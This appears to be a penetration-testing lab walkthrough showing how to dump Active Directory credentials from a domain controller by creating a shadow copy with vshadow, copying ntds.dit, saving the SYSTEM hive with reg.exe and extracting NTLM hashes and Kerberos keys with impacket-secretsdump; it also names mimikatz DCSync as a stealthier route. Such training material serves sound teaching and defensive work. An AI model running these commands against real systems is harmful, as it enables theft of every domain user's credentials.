Shadow Copies

The Volume Shadow Service (VSS) in Windows allows for the creation of snapshots of volumes or files. An attacker can leverage the vshadow utility to create a shadow copy of the AD database, ntds.dit, from a DC. After extracting the database and SYSTEM hive, they can use tools like impacket-secretsdump to dump user credentials, including NTLM hashes and Kerberos keys, offline.

The SYSTEM Hive is a registry file that stores system-level information in Windows, which is required to successfully decrypt the ntds.dit database for credential extraction.

In our scenario we will login to DC1 as jeffadmin.

1. Shadow Copy

Create a shadow copy of the C: drive on DC1 with vshadow.exe (-nw disables writers, -p stores the copy on disk).

vshadow.exe -nw -p C:

2. Copy DB

Once the snapshot is created, we will use the shadow copy device name to copy ntds.dit to the local disk.

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\ntds\ntds.dit c:\ntds.dit.bak

3. Extract SYSTEM hive

Extract the SYSTEM registry hive.

reg.exe save hklm\system c:\system.bak

4. Extract Creds

Transfer the .bak files to our attacker machine and extract the credentials.

impacket-secretsdump -ntds ntds.dit.bak -system system.bak LOCAL

DCSync with mimikatz is a stealthier method for extracting user hashes from a DC without leaving as obvious a trail.